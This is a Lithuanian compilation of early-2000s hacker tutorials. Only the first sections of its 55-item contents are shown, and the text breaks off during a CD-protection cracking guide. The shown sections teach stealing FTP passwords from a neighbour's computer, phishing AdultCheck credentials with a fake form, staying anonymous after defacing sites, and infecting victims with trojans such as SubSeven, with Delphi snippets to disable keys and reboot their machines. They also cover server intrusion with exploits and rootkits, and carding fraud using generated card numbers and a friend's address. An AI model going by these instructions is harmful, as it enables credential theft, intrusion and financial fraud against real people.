“HAKERIO PRADŽIAMOKSLIS”
Kevino Mitniko idėjos nemirė. Visų šalių Hakeriai vienykites.
Įsivaduokime iš Matricos gniaužtų..
Straipsniai surinkti iš lietuviškų hakerių svetainių. Speciali padėka autoriams
Turinys:
1. Access Aproved
2. Mazhas Adultcheck ID gavimo tutorialas
3. Kaip anonimizuotis ir bandyti likti nepastebetam.
4. Proxy
5. Trojos arkliukai arba kaip jie veikia?
6. Hackingas ir cardingas ZHALIEMS
7. Pasirasyk savo CGI maileri
8. Coll www
9. CRACK
10. UNIX Cracking
11. Delphi
12. Freecell for Windows 98 SE krekinimas
13. Domenas dykai
14. FTP totorial`as
15. FTP Tutorial 2
16. Taksofonai zhaliems
17. Ouestbook hack
18. Hackeriai pries crackerius
19. Internet Hack
20. Keletas irc pamokeliu
21. Kaip nesielgti hakinant
22. Kaip tapti hakeriu
23. Kaip veikia trojanai
24. KREDITINES KORTELES
25. L0phtCrack v2.5 krekinimas
26. Linux tutorialas naujokams
27. Laikinas LINUX tinklas namie
28. HACKERIO MANIFESTAS
29. mIRC bug’s
30. mIRC innvisibility
31. mIRC’o slaptybez
32. NAMEZERO
33. Linux Naujokams
34. UNIX Naujokams
35. Nmap’o panaudojimas hack’o tikslais
36. NMAP (2)
37. Paranoja arba kaip neikliuti
38. Kaip Palikti Inicialus Nulauzhtoje Programoje
39. Trumpai apie PGP
40. Proxy
41. Proxy Adresai
42. REGISTRAS
43. Kur pradedančiajam Hakeriui ieškoti info?
44. Serverio nukepimas
45. Servisai
46. Shell dykai
47. TCP/IP totorial`as
48. Toniniai signalai telefonijoje
49. Technologinio andegraundo atstovu tipologija
50. Trashing
51. Trashingas 2
52. trOJAN REMOVAL
53. Web crack
54. XOR- sifravimo metodas
55. Kaip nucrackin’ti WinZip 7.0
1. Access Aproved
Senais gerais laikais, kada 486 buvo dievu kompas, zhmones kurie naudodavosi tinklo paslaugomis passwordus galvodavo tokius kaip ‘sex’,’fuck’,’peace’ ir t.t. Tada shiuolaikinis hackeris tikrai galejo ramiai tokiais passwordais pasinaudoti. Kartais Tokiu kvileliu paasitaiko ir dabar, kurie vitoj passwordo rasho savo varda, pavarde ar dar ka nors, kas susije su juo. Kartais uzhtenka nueiti i koki http://superhacker.hypermart.net ir pazhiurejus i skiltele “apie mane” galima rasti passworda. Na kaip minejau, tokiu dabar vienetai, bet vi
1. Niekada negalvok passwordu, tokiu kaip tavo vardas, pavarde ir t.t.
2. Passwordas turi buti sudarytas ish nemazhiau kaip 6-7 simboliu. Ish ju turi buti kaichiai, didzhiosios bei mazhosios raides.
3. Niekada nespausk ant accountu loginu esanchiu skyreliu “Save my password”
4. Niekada neishsaugok passwordu savo PC visokiose passwords.txt (Tam yra galva, jei nera tai tau shakes 🙂
5. Niekada kiekvienam atskiram accountui nekartok to paties passwordo, nes jei suzhinos viena zhinos ir visus kitus.
Tai keletas patarimu. O kaip nulauzhti tuos gudruolius, kurie shiuos patarimus jau senai zhino ir ju laikosi? Na, jie tikrai gudrus, bet mes gudresni :). Tarkim mes priejome prie kaimyno koompo, kuriame yra instaliuotas CuteFTP, o shi programa buvo naudota kaimyno saitui aplaudinti. Ka mes darome? Aishku einame i C:Program filesCuteFTP (gali buti ir kur nors kitur). Pirma suzhinokime esamos programos versija. Tarkim kaimynas turi CuteFTP v2.5. Ten tirkai bus toks failiukas kaip SMDATA.DAT, kuris ir saugo visus naudojamus FTP adresus, username’us bei beabejo passwordus, kurie buna uzhshifruoti nesunkia shifruote. Ta failiuka mes netychia isimetame i savo senai paruoshta floopy, ir su piktdzhiugishka shypsena neshates ji namo. Namie, pasiemes alaus bu
Dar ka norechiau priminti: Ne shtai keletas CuteFTP versiju bei failu, kuruose laikomi ju passwordia:
HOSTS.DAT – CuteFtp V. 1.x
TREE.DAT – CuteFtp V. 2.x
SMDATA.DAT – CuteFtp V. 2.5/2.6
Ir nepamirshk, kad ne tik shi programa turi tokiu failu. Turi ir kitos, tau tereikia juos surasti!
Sekmes!
2. Mazhas Adultcheck ID gavimo tutorialas
Adultchecko ID gavimas yr labai paprastas. 🙂
1.Atsidaryk Hotmailo ar usa.net emailo akaunta (pvz.hotmail@hotmail.com)
2.Naudodamasis nauju emailu atsidryk geocities akaunta
3.Susirask tikra Adultchecko saita ir nusikopijuok jo koda
4.Pakeisk taikini ish adultcheck.cgi (ar kas ten bebutu) i
www.geocities.com/tavo_vartotojo_vardas.cgi – Ka shitai du
Ogi ishsiunchia nieko neitarinchios aukos duomenis, ivestus i forma
(pvz. ju adultcheck ID) i geocities cgi bin kuris redirektina juos i
hotmail@hotmail.com.
5.Nukreipk auka i TIKRA adultchecko ID puslapi po to kai jis bus ivedes
info..jiems tai atrodys kaip kox keistas nesusipratimas (dauguma windoze
vartotoju yra priprate prie to ir negalvos apie tai dar karta.. netgi
jei ir pagalvos, tai bus jau velu).
6.Ikishk savo nauja puslapi kur nors,tinka bet kur, netgi tavo geocities
akauntas tix, tik nekishk jo i pirma puslapi – jame geriau tix kox nors
“hi im mike.. I’m 15 and this is my first homepage!! isn’t it kewl!!” ir
prispausdink visokio meshlo geocities kopams.
7.Viliok zhmones i savo saita. ir Valio! dabar tu esi ishdidus autentishku
adultchecko ID ir passwordu savininkas.
Kelios mintys pamastymui.
Visada naudok proxy ar wingata nustatinedamas ar ieidinedamas i savo
akauntus. Juk tu nenori palikti savo realaus IP bet kur, jei del kokios nors
priezhasties jie noretu tave susekti.
Niekad nedek netikro puslapio savo IPT serveryje.tai papraschiausiai kvaila.
Bandydamas ivilioti potencialias aukas i savo saita, NIEKADA nesiusk spamo
i tokius newsgroupus kaip alt.hackers ir t.t. pasilik tai alt.sex ir panashiam
meshlui.
Galiausiai, apdenk savo klaviatura plastiku, apvyniok klavishus, kad pirshtai
neliptu..ir nepaliktu pirshtu atspaudu.
Have Fun
pagal
ThePsyko
Public Enemy #7
“God told me to skin you alive”
http://prozac.iscool.net
medzhiaga paruoshe Winter Wolf.
3. Kaip anonimizuotis ir bandyti likti nepastebetam.
By Craft[Eye] // http://www.underground.lt // CraftEye@gmx.net
Kai ku
Provider – interneto tiekejas(kaip takas)
Proxy – serveris per kuri galima jungtis norint pasiekti puslapi ir t.t.(jis padidina shansus likti nesugautam)
Logas – textinis failas kuriame saugoma visa prisijungimo, siuntimo, gavimo ir panashi informacija.
IP – na paaishkinsiu aishkiau – kiekvienas kompas turi ip sudaryta ish x.x.x.x kur 0 <= x <= 255, pagal shi skaiciu galima suzhinoti daug informacijos apie prisijungimo vieta, provaideri ir t.t..
PGP(Pretty Good Privacy) – vienas ish populiariausiu informacijos kodavimo budu.
Intro
Visu pirma ash esu gaves kelis klausymus kaip “kaip NEANONIMISHKAI nuhakinti sajta?”. Manau tikrai geras klausymas =].Ir ir ji lengva atsakyti. Jei nori nuhakinti saita ir likti pastebetas tau tiesiog reikes atsijungti visus proxy ir t.t. Ir eini prie kokio taikinio ir lauzhi. Bet kas ish to? Ka tai duos. Manau daug esmes hake yra ne tame kad shoostrai defeisisni sajta, o kad liksi nepastebetas. Nors shiais laikas yra labai sunku tai padaryti, visi provaideriai veda logus ir t.t. Na bet pameginti verta ar ne?
Kodel tau reikia saugotis?
Na pirma nuo 2000.01.01 isheis istatymas ir tada jau tu nebegalesi laisvai eiti per visus guestbookus, forumus, web boardus ir deti visu skriptus neuzhsidejas ne proxy. Antra ar tau patinka, kai kas nors skaito tavo laishkus? Manau ne. Shtai kodel anonimishkumas nedrysiu sakyti hakeriui, bet zhmogu kuris jauchia kad zhino shiek tiek daugiau uzh kitu yra labai svarbus dalykas.
Asmenybe
Niekada neishduok savo tikro vardo(na vardas nesvarbu, nors jeigu tavo vardas koks Aldevinas, o toki ash tik viena savo mieste zhinaw tai gali atitinkamai padeti tam tikriems zhmonems), amzhiaus(principo reikalas), pavardes. Manau duoti savo adresa kokiam neaishkiam zhmogui IRC ar dar kur yra ishvis didelis absurdas. Manau visi turetu buti private virtualiame pasaulyje. Heh atsiminkite, kad IRC butu lengva jus surasti, jei rekaujate pilna gerkle kokia tavo pavarde + pazhiureje /dns ar /whois gali pamatyti *!*@vln.dialup.takas.lt ar da ka nors turbut visiems aishku ish kur tu, o dar kai reki kokiam kanale ash Jonas Jonaitis ir t.t. Savo draugam gali pasakyti tik varda, nes esu mates pora atveju IRC kaip ei Jonai Jonaiti varysi i infobalt, taigi draugai irgi gali buti pavojingi buti.
Nickas
Nevartok to pachio nicko hackuose ir IRC. Nes tada jau lengvoka bus tave atsekti, kaip sakant STT =] darbuotojui reikes pasedeti kanale, susidraugauti su tavim ir jau tada. Na aishku jei ruoshiesi daryti, ka nors kokiam draugelio puslapiui tada manau nereikes keisti nicko, bet jei ka nors rimtai, tai tada geriau saugokis. Na jei aishku tavo draugelio tevas ne koks telekomo direktoriaus pavaduotojas.
Nickas ir ne tik IRC
Heh ish praktikos sakau – padefeisina kas sajta ir kisha i forumus hpc puslapiuose DEFACE by ME ir t.t. Manau, kad tai irgi neapgalvotas zhingsnis, nes jei neatseks tuo momentu kai hakinai puslapi ish logu atseks per forumus tavo ip(netgi yra forumuose ivairiuose moderatoriams opcija show ip, o per ju sourcus perejus ar adminam laishka parashius tikrai ip suzhinos, manau nemazhai kas). Jei reksi gerkle visuose forumuose ir wwwboarduose tai ishlysi i pavirshiu ir t.t. Cha kas sake, kad adminai nesilanko HPC puslapuose? =]
Kaip tave gali pagauti?
Ooo simple. Kai kada adminai tiks ispeja, jei nesiliausite imsimes priemoniu ir t.t. Chia geri adminai, blogi adminai kartais uzhsiima tavimi rimtai. Na o kaip jie tave pagauna, chia paprasta kiekvienas provaideris veda logus, jei jungiesi per proxy(apie tai veliau) jie gauna jo IP adresa. Na loguose dazhnai buna narshykles, pashto programos ar pan. versija, LAN kortos numeris, pribumbasiu visokiu – bet svarbiausia ip adresas. Paprasciausia situacija – tu nupyliai puslapi, adminas susinervina, pasizhiuri logus – aha tako ip numeriai, gerai. Pasiima savo mobilu ir surenka koki telekomo telefona > tai padaro 3 val(jei neklystu ne 100% informacija) begyje > tada telekomo dedez pasako telefona ir adresa ant kurio uzhregistruotas telefonas. Kaip jau sakiau geras adminas paskambins ir ispes tave, blogas adminas paprashys telekomo, kad atjungtu tau telefona – shis taip ir padarys, o jei dar skolu uzh telefona turejai – viskas. Ir sedek zhmogus be telefono, kaip akmens amzhiuje. Chia tik pavyzdys. Jei jungsies per proxy, tada adminas parashys draugishka laishka proxy savininkam, jei negaus logo duomenu tada adminas pasakys, kad rimtas reikalas pateiks irodymus ir panashiai, tada proxy davininkas isako adminam duoti duomenis. Tada pamato blogasis adminas, kad per proxy jungtasi ish dial-up, tada jau istorija kartojasi.
4. Proxy
Na papraschiausias budas paslepti savo ip adresatai jungtis per proxy. Visur kur jus lankysites : kaip jau minejau forumuose, wwwboarduose ir t.t. bus rodomas proxy ip. Tai labai smarkiai nepadidins galimybes buti nepagautam, bet shiaip del nekalto browsinimo tai labai naudinga. Kaip konfiguruoti jusu IE,NETSCAPE ar OPERA rekomentuosiu. Tai gana lenga(susirasit patys kaip sakant). Shiaip proxy naudoja du portus 80 ir 8080. Proxy adresas dazhniausiai atrodo taip : proxy.anonimyzer.com ar panashiai. Proxy hakui nera taip pat saugu del jau minetu priezhaschiu. Geriausiai daryti proxy grandine turiu omeni pvz: dial-ip > proxy1.bmw.com > proxy3.audi.com > proxy2.stt.com =] ir paashiai, na bet chia reikes sugebeti padaryti. O tada jau adminam bus sunkiau atsekti tave, jie painiuosis(kuo daugiau proxy tuo geriau). Dar viena nezhymi detale > tik nenaudok skirtingu proxy nuo vieno providerio > kaip proxy.5ci.lt > proxy1.5ci.lt ir t.t. Zhodzhiu proxy bootinas.
Apie laishkus trumpai. Jei nenori, kad provideris skaitytu tavo pashto ir pan. Papraschiausiai koduok juos. Yra dabar visokie PGP(Pretty Good Privacy) plachiau www.pgp.com. Gali aishku su draugu sugalvoti savo kalba ir t.t. =]]
Na menka, bet reikshminga detale > nenaudok provaideriu savoje
shalyje. Jie tikrai supras tau rashomu laishku turini. O jau provaideriai uzhsienije, kokioje Japonijoje ar USA/CANADA niekas tikrai nesupras lietuviu kalbos > nereiks nei PGP:). Be to uzhsienio meilai patogesni ir galingesni nei Lietuvos provideriu(musu mylimas puslapiukas www.takas.lt :).
Pabaigai
Zhodzhiu chia aptariau tik kelis budus kaip apsisaugoti ir kaip tave gali pagauti, bei zhinoma svarbiausia, kad nejaustum baimes, kad tavo laishkus skaito koks nors adminas ir juokiasi :). Kaip sakoma atsargiausias – mobiliausias ar kaip ten. Shiaip manau ishpuikimas ir norejimas parodyti save labai PADIDINA shansus, kaip buti sugautam. Ir smarkiai. Ir jei nori parekti koks ash esu ir kad ash sajta “padariau” tai pasiroopink anonimishkumu. Manau ir be to turi galva ir pasiroopinsi anonimishkumu ir nereksi kur papuola “HACKED”. O poto adminas sakys you’re FUCKED. Nu chia lyrinis nukripimas. Zhodzhiu pagalvokite priesh darydami.
Last Message: Anonimas yra niekas, nes jo papraschiausiai nera.
Original text by Craft[Eye] // CraftEye@gmx.net
2000(c) Special for www.underground.lt nu jus supratot ane?
5. Trojos arkliukai arba kaip jie veikia?
Trojos arkliukai (arba kaip jie veikia)
Turbūt daugelis iš jūsų žino kas yra trojanai. Bet ne visi žino kaip jie veikia. Jei hackeris nenutuokia kas yra IP arba portai tegu verčia kitą puslapį. Jei ne, tai kaip sakoma – važiuojam :).
Daugelis iš jūsų turbūt yra žaidę su trojanu(įsivaizduoju vargšo lamerio veidą, kai jam atsidarinėja cd-rom’as ir kaip jis bėga pas kanors pagalbos arba kiša diskelį su 1990 metų Dr.Web :)) Visų pirmą, jie dirba tinklu, dažniausiai TCP/IP protokolu, nes jis popiuliaraiusias juo sukasi Inetas, ir kad kitas žmogus būtų “užsikrėtęs” Trojos arkliuku jam reikia jį gauti ir paleisti. Žmones dažniausiai gauna trojaną e-muilu arba IRC – čia populiariausi būdai (na žinoma tu gali nueiti pas savo draugeli ir pasakyti va čia geras geimas nori? Geras draugas žinoma neatsisako – po tris kartus paleisto “žaidimo” tu jam pasakai, kad turbūt sugedo diskelis! :)) Kai tik paleidi Trojos ponį, jis tuoj perkopijuoja save į C:Windows ir t.t., įsirašo savo paleidėją į kokią nors sisteminę vietelę – rejestrą, kokį nors sisteminį failą(win.ini ir pan.), gudresni išvis gerai daro – susikuria tokį failą su plėtiniu *.VxD(Virtual Extended Driver ar pan.:)) ir nukopijuoja failiuką į c:WindowsSystem, o toliau kai kompas kraunasi Windozai tiesiog “paleidžia” visus *.VxD failiukus. O tada musų draiveris jau paleidžia išsvajotąjį trojaną:). Pusę darbo jau atlikta(jei aišku pas auką nėra ten kokio Norton Doktor Vebas 3000 Milenium Super Profesional Special Edition 😉 – bet ir tai kaikada nepadeda, jei geras trojanas:)). Lieka sužinoti aukos IP – čia jau kaip iš bobutės rankinę atimti(kai kuriais atvėjais). Jei niusiuntei trojaną mIRC’u, tai tiesiog parašai /dns to_kuriam_nusiuntei_trojana_nikas – ir parašo tau jo IP, jei paštu sunkiau – bet kai kurie poniai siunčia IP adresą į pasirinkt’a muilą, jei tu nori pažaist su draugelio kompu – run kortelėje parašai winipcfg(jei WinNt tai – wintipcfg:)). Sužinai jo IP /valio/ paleisk savo kompe vadinamąjį Remote Control’a (tik netą dalį su siurprizas.exe), o tą dalį su kuria valdysi aukos kompą. Ten būna toks laukelis IPHost ar dar kas nors – įrašai skaičiukus arba host vard’a – pvz 0.0.0.0(IP adresą, o ne savo gimimo datą kaip esi pripratęs daryti kai pildai anketą dėl nemokamo cd :)) Spaudi mykoliuką konekt ir jei parašo “succesfuly connected to 0.0.0.0” ar panašiai – tada jau prasideda:).
Jau gali būti BEVEIK įsitikinęs kad žaisi su kažkieno kompu. Kodėl beveik? Todėl, kad serveris ar dar kas nors gali būti password protected(pvz senasis NetBus trojanas sugeba prisijungti prie savo serverio, gali gauti failų sąrašą, bet kai bandai trinti failiuka win.com 🙂 arba atidaryti cd-rom NetAutobusas sako kad serverio kompas apsaugotas nuo redagavimo su password’u ar kokia programa:( ). Bet jei jau sugebėjai prisijungti, 9 atvėjais 10 tu jau naujasis kompo adminas :)). O įvairių trojanų galimybės neregėtos:
1. Valdai kompo failų sistemą.
2. Valdai rejestrą.
3. Kontroliuoji visus įrenginius(gali net atspauzdinti tekstą “hi lama” su aukos printeriu, jei jis įjungtas arba valdomas programiniu būdu t.y. neturi on/off mygtuko :)).
4. Gali peržiūrinėti ekrano vaizdą ir paspausti mygtuką su užrašu X lamos ekrane :).
5. Jei jis dirba kokiame nors WinWord gali jam tiesiai į jo redaguojamą vietą parašyti kokį eilėraštuką.
6. Gauti password’us :).
7. Įrašinėti jo renkamą tekstą klaviaturoje(nebijokite negausi jokių ************* vietoje freexxxvideos :))))).
8. Ir išvis daryti ką nori.
Ir dar daug daug įvairių galimybių. Bent aš asmeniškai rekomenduoju “ten” ikišti kokius 4-3 trojanus ir tada išvis jėga(juk visi Trojos arkliukai skirtingi).
Beje trojanai dažniausiai naudoja WinApi funkcijas(tokias kaip ExitWindowsEx() – jos tinka bet kokiai programavimo kalbai nuo Asemblerio iki VC++ ir Delphi, nes jas realizuoja ne programa, o Windozai, jas tik reikia iškviesti :)). Galiu pademonstruoti kelias jų, jei bandysite patys daryti savo trojaną(pavyzdžiai Delphi sintaks, bet tikram hackeriui juk nesunku išversti iškalbos į kalbą, jei kalba ne kokia VC++ ir ją verti į Asmeblerį:)) kaip duomenys perduosi tinklu- tavo reikalas, o kaip badaryti kelis triukus aš tau parodysiu:
Pavyzdžiui reikia perkelti kursoriu į kitą vietą:
SetCursorPos(x ašies kordinatė,y ašies kordinatė) – apie x,y mokeisi mokykloj, jei ne bandyk įdomesnį variantą :
Randomize;
SetCursorPos(Random(Screen.Width),Random(Screen.Height));
Efektas nuostabus. Perkels kursorių į betkurią ekrano vietą:). Nori perkrauti kompą, išjungti – jokių problemų:
ExitWindowsEx(flagas,0); vietoje žodžio flagas rašyk:
Jei nori perkrauti kompą – EWX_REBOOT, išjungti – EWX_POWEROFF, atsijungti nuo esamo vartotojo – EWX_LOGOFF. Va, visa artilerija :).
Ką dar įdomaus galima padaryti hmm pagalvokime. Sugalvojau – paleisti programą :
WinExec(‘programos pavadinimas’,1); Tos kabutės reikalingos 😉
Beje mano pirmojo trojano pagrindinė funkcija buvo paleisti 1000 notepad’ų. Skamba paprastai, bet vaizdas nepakartojamas:). Jei nori ko nors įdomesnio – prašau, sisteminių klavišų atjungimas:
PROCEDURE TurnSystemKeysOff;
VAR
dummy: INTEGER;
BEGIN
SystemParametersInfo(97, INTEGER(TRUE), @Dummy, 0);
END;
Taip pat galėsi juos ir įjungti:
PROCEDURE TurnSystemKeysOn;
VAR
dummy: INTEGER;
BEGIN
SystemParametersInfo(97, INTEGER(FALSE), @Dummy, 0)
END ;
Na dabar aukai galėsi padaryti tikrai cirką, jis vargšas metysis į šalis – jam ekrane vien notepad’ai, negana to kursorius mėtosi į visas šalis(kaip jis kryžiuką paspaus?:)), jo vienintelė viltis Ctrl + Alt + Del ir taip uždaryti visus notepad’us – bet kas gi čia neveikia nei vienas sisteminis klavišas lieka viena išeitis perkrauti “su protu susipykiusią, kvailą mašiną” , bet jam ir vėl vargti nereikės – kompas staiga pats persikrauna – viskas jis formatuoja hard’a. 🙂 Linksma ar ne? Aš irgi taip manau.
Manai, kad trojanai labai piktas dalykas – iš dalies taip. Kai supranti kaip jie veikia jį lengviau pašalinti, bei supranti jo keliamą pavoju tavo kompiuteriui! Beje Trojos poniai gali ir pasitarnauti – yra žmonių kurie adminisruoja nutolusius kompus su trojanais.
Ir dar – jei patys nenorit, tingit rašyti savo trojanų parsisiūskit kokius 5 ir susiraskit aukų. Trojanų pilna internete. Aš rekomenduočiau SubSeven gold ar dar kokį iš tos serijos(mano mylimiausias), taip pat DeepThroat 3,1 ar naujesnę versiją vertėtų parsisiųsti. Na kaip nepaminėsi senbuvių – BO2k(Back Oriface 2000) ir NetBus Pro. Dar yra įvairių įvairiausių. Manau pilniausią jų sarašą galit peržiūrėti galite Web puslapyje http://www.tlsecurity.net/amt.htm ten yra pilnas daugelio trojanų aprašymas ir būdai kaip jį panaikinti :).
Na ką draugai hackeriai aš su jumis. Jei ką rašykit! Tikiuosi straipsnis patiko! Jei ne, ką padarysi ne visiem įtiksi, jei ką rašykit man į muilą.IKI Gero Hack’o!
Craft[Eye] – CraftEye@gmx.lt
6. Hackingas ir cardingas ZHALIEMS
Sitam texte pateikiami *TIK* pagrindai . Tai visai nereishkia, kad jie gali buti visur
sekmingai panaudoti . Ash(autorius) neatsakau uzh jokia zhala, kuria JUS pridarysite
naudodami shia medzhiaga . Ash neskatinu nei isilauzhimu nei cardingo ir nereishkia
kad ash tuo uzhsijimu jei rashau toki texta .
1.Hakingas
1.1.Serveriu hakingas
Serveriu hakingas susideda ish keliu etapu :
1.Portu skanavimas
Siunciami paketai i tam tikra serveri ir ieshkoma atidaru portu . Skaneriai gali buti
padaryti per cgi (RI7S toolzai) ar veikti tiesiai jusu kompe . Yra skaneriu beveik visoms
sistemoms . Vienas gereusiu ant UNIX tipo sistemu(linux,minix,AIX,SunOS)
veikianciu skaneriu yra nmap (www.insecure.org) . Yra skaneriu ir ant win9x bei winNT bet
jie yra labai ribotu galimybiu, bet savo funkcija atlieka .
2.Servisu aptikimas pagal portus
Tam yra servisu pagal portus sarashai bet ir be ju daug kam zhinoma, kad pvz WWW servai
eina ant 80 porto .
3.Servisu serveriu versiju nustatymas
Reikia telnetintis i tam tikra porta . Jei nemokat(?), tai i FTP(21 portas) galit prisiko-
nektint naudodami paprashciausia FTP client’a ir jum dazniausiai parashys versija .
4.Exploitu tom versijom ieshkojimas
Nu susirandat ir uzhrashot visu servisu versijas ir puolat ieshkot exploitu inete .
Nu galit eiti i astalavista.box.sk(ar www.av.com) ir rasykit “exploits” gal surasit saita
kuri pamegsit . O gal jau toki turit . Nu sheip keli exploitai yra mano megstamam
lietuvishkam saite ri7s.cjb.net . Bet ten yra tikrai ne visi exploitai .
5.Exploitinimas
Tada imat ir konkektinates prie savo linux shell’o ir kompiliuojat exploita .
Yra ir komplieriu ant windows bet ash tuo nesidomejau . Jei neturit shell’o nueikit
(Klaipedoj) i KU ir jums tikrai duos . Jei gyvenat kitam mieste tai galit prashyt kietesniu
pazhystamu . Zhodzhiu cia jusu reikalas kaip susikompailint .
6.Backdoorinimas
Instaliuojat koki rootkita priesh tai pasidomeje juo(RTFM) . Galit koki norit
kita trojana ajshku . Nu pasiieshkokit .
Nu jau ir turit access ant serverio . Gal eggdrop’u statyt nepulkit, bet . =]
1.2.Windoze peremimas ( Ce apie access ant windoze kurio owneris yra 101% lamah .
Kitaip neveix :[ )
Tai wo . Imat kokia progshe . Nu trojana . Surandat SERVER dali bet jos nepaleidzhiat,
o ikishat kokiam lamah . Placiau : Susitinkat per IrC ir sakot : “ei xebrantas !
Ar tik nenori hakeriu but ??? Imk zhek cia galesi isilausht i kompus su tokia programa ! “
=] Lamah paima jusu SERVER’i . Executina . Jus executinat CLIENT trojano dali ir konek-
tinaties prie lamoz . Tada siulyciau i sisteminius failus ivaryti koki kita trojana .
Nu cia reikalinga todel, kad jei pirma trojana suras . Nu yra tokios programeles kuriu anti-
virus negaudo . Jos nevadinamos TROJANAIS o gali buti panaudotos tam . Oficialiai ir trojanai
vadinasi REMOtE ADMINISTRATION toolz . Taigi ieshkokit komerciniu toolz’u crack’inkit .
Keli patarimai : neikit savo niku, naudokit proxy ir raukites tik ant 24/7/365 access’a prie
ineto turinciu kompu .
2.Cardingas (*DEMESIO* sita draudzhia lietuvos istatymai)
1.Imat netscape ir instaliuojat
2.Paleidziat
3.Susirandat WWW proxy kruva .
4.Sukonfiginat kad veiktu per proxy grandine (proxy.ktu.lt:8080//proxy.com:81//proxy.jp ir
paskutinio serverio porta porto vietoj) . Uzh tai ash dekingas vienam xebrantui kurio zhinute
pastebejau RI7S BB .
5.Imat CC# generatoriu ir darot CC# .
6.Konektinates prie saito kuriam zhadat pirkt .
7.Susitariat su draugeliu, kad nesakys niekam, kad pas ji atejo kokia preke .
8.Rashot savo varda ir pavarde, CC#, draugelio adresa tikra .
9.Zhiurit kad prekiu verte nevirshytu 700Lt nes nereikia muito moket iki ~tiek .
10.Laukiat prekiu ir niekam nesake pasiimat is draugo dezhutes cheki nueinat i pashta
ir pasiimat preke .
11.Jei kas, draugas sako kad nieko nebuvo ir kad jis taves nepazhysta .
Taigi kolkas viskas, bet kaip zhaliems turetu uzhtekt tokio gaido .
Written in 2000/07 by jogis
7. Pasirasyk savo CGI maileri
Manau daugelis noretu moketi padaryti cgi pasto programa,
ar ka nors panasaus, kas dirba su socketais.
Zemiau pateikiu su komentarais gabaleli skripto,
kuris siuncia email`a.
############## Duomenys gauti is formos ###########
$from=$FORM{‘from’};
$to=$FORM{‘to’};
$subj=$FORM{‘subj’};
$msg=$FORM{‘msg’};
###################################################
($x,$x,$x,$x, $here) = gethostbyname($null);
($x,$x,$x,$x, $there) = gethostbyname($smtp_server);
$thisserver = pack(‘S n a4 x8’,2,0,$here);
########### Priespaskutinis kintamasis- konstanta yra portas (25)
$remoteserver = pack(‘S n a4 x8’,2,25,$there);
############## Kuriam soketa #######################
(!(socket(S,2,1,6))) && (&error(“SMTP EMAIL: Connect error! socket”));
############## subindinam ##########################
(!(bind(S,$thisserver))) && (&error(“SMTP EMAIL: Connect error! bind”));
############## konektinames su serveriu ############
(!(connect(S,$remoteserver))) && (&error(“SMTP EMAIL: connection to $smtp_server has failed!”));
################# parenkam/ sukeiciams deskriptorius
select(S);
$| = 1;
select(STDOUT);
################ skaitom soketo (serverio) ir tikrinam ar nera klaidu
$DATA_IN = ;
($DATA_IN !~ /^220/) && (&error(“SMTP EMAIL: data in Connect error – 220”));
################### toliau viskas vyksta #################
################### paprasciausiai perdavinejan #################
################### smtp servui komandas #################
print S “HELO tavo_hostasrn”;
$DATA_IN = ;
($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: data in Connect error – 250”));
print S “MAIL FROM: $fromn”;
$DATA_IN = ;
($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: $emailfrom address not valid”));
print S “RCPT TO: $ton”;
$DATA_IN = ;
($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: $recipient address not valid”));
print S “DATAn”;
$DATA_IN = ;
($DATA_IN !~ /^354/) && (&error(“SMTP EMAIL: Message send failed – 354”));
print S <;
($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: Message send failed – try again – 250”));
print S “QUITn”;
8. Coll www
Pasidaryk šustrą puslapi Pasidarei shustra puslapi? Apie ka jis? Nuogas merginas, mashinas, kompiuterius, ju lauzhyma. Na nesvarbu. Svarbu, kad tavo www yra geras ir todel tau reikes ji patalpinti geoj vietoj ( kalbu ne apie kuno daly :). Internetas dabar prikimshtas visokiu redirektu, vietu puslapiams bei kitu patogiu dalykeliu. Shiame straipsnyje ash papasakosiu kaip atsikratyti daugelio nervinanchiu baneriu, kur patalpinti savo puslapi, kur gauti gera redirekta ir net kaip uzh veltuj gauti DOMANA! Pradekime nuo patalpinimo. Shtai tarkim hypermart.net. Duoda tau adresa “vardas.hypermart.net”. Galesi siusti 20 megu, bet kiekvienam tavo puslapyje metys labai nervinanti baneri, kurio labai paprasta atsikratyti.
9. CRACK
Sitame tutoriale, as jums parodysiu kaip nulauzti, CD apsauga, naudojant Win32Dasm ir Hiew.
Na ka, pradedam:
Visu pirma, jus privalote paleisti ta zaidima, kuri jus norite nulauzti, be CD. Na aisku zaidimas nepasileis, (Prasau tik nepanikuokite:), viskas, ka jus pamatysite tai, isokanti lanaga kuris pranesa “gera naujiena”. Na ka si zinute tai tikrai gera naujiena, nes ji mums ir pades patvarkyti ta nelemta zaidima, taigi viskas ka jus siuo metu turite atsiminti, tai ta zinute, kuri jums pranese, kad reikalingas CD. Pavyzdziui: Please insert the – CD, arba: You need the CD to play the *** .( ***, yra zaidimo pavadinimas, kuri jus norite nucrackinti). Beje jei jus esate su ribotu atminties kiekiu savo galvoje, ir nesugebate atsiminti sios zinutes kuri praso CD, tai uzsirasykite ja, ant kokio nors popiergalio. Taigi dabar pasileiskite Win32Dasm, ir atsiradusiame lange paspauskite DISASSEMBLE, po to isokusiame meniu, pasirinkite OPEN FILE TO DISSASSEMBLE. Atsiras kitas langas, kuriame jus turesite susirasti to zaidimo exe faila, kuri norite nucrackinti. Kai tai atliksite, prades begti tokia eilute, taigi tai ustruks kelias minutes, taigi siulau pramankstinti savo kojeles ir patraukti kur karaliai pesti vaiksto:).
Na ka baigesi? NE, na gerai dar palaukim, na kaip dabar? na OK procesas baigtas. Dabar jusu ekrane turejo atsirasti keistas tekstas, kurio mes visiskai nesuprantam:). Nesijaudinkite, vienintelis dalykas kuri dabar jus turite padaryti, tai susirasti antra mygtuka esanti is desines (String Data Reference), kuris yra salia printerio mygtuko. Dabar jus matote langa kuriame surasytos ivairios zinutes ir panasiai. Taigi susiraskite ta zinute kuri prase CD ir paspauskite du kartus ant jos. Uzdarykite STRING DATA REFERENCE langa. Dabar jus esate nebe kodo pradzioje, o kazkur viduryje ar kazkas tokio, kiekvienu atveju vis kitaip. Taigi dabar jusu ekrane turi matytis ta zinute kuri praso kompakto. Dabar pati svarbiausia vieta. Kilkite i virsu, nuo tos zinutes, kol pamatysite kazka panasaus:
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00410545 (c)
|
